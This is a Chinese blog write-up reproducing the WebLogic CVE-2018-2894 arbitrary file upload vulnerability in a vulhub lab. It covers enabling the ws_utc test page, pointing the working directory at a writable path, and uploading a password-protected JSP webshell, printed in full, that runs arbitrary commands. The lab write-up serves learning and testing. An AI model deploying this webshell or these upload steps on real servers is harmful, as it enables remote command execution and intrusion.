weblogic任意文件上传漏洞复现(CVE-2018-2894)

CVE-2018-2894复现

weblogic任意文件上传漏洞复现(CVE-2018-2894)

漏洞限制

  1. 需要登录
  2. 需要写权限

环境搭建

本次漏洞为了更真实的模拟实际环境,使用vulhub在vps上搭建。
首先vps防火墙开启7001端口,这是环境启动后的端口
搭建vulhub靶场的教程网上很多,也可以参考官网
搭建完成后使用sudo docker-compose up -d启动weblogic任意文件上传漏洞环境。(这里使用了另一个漏洞环境的启动截图(^_^))。
在这里插入图片描述
使用sudo docker-compose logs | grep password查看登录账号和密码。
在这里插入图片描述

漏洞复现

访问http://your-ip:7001/console并使用刚才得到的账号密码登录
在这里插入图片描述
访问base_domain
在这里插入图片描述
高级->启用web测试页
在这里插入图片描述
访问测试页面/ws_utc
在这里插入图片描述
发现存在限制,直接访问config.do页面
在这里插入图片描述
设置工作目录为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
指定工作目录的目的是为了写文件,所以需要指定可写目录为工作目录。
在安全界面上传webshell。
这里使用有回显带密码验证的webshell。

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

抓包得到时间戳。
在这里插入图片描述
拼接/ws_utc/css/config/keystore/[时间戳]_[文件名]并分别访问。
可写目录成功执行。
在这里插入图片描述
不可写目录虽然显示上传成功,但访问返回404。
在这里插入图片描述

使用工具

使用Upsploit工具进行上传测试。
抓包上传数据包
在这里插入图片描述
在这里插入图片描述
将上传数据包放入run test
在这里插入图片描述
在这里插入图片描述
上传成功,访问上传文件,成功弹窗。
在这里插入图片描述
还有其他上传方法,就不一一列举了,直接看结果。
在这里插入图片描述
可以看到上传的内容,为javascript语句。

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值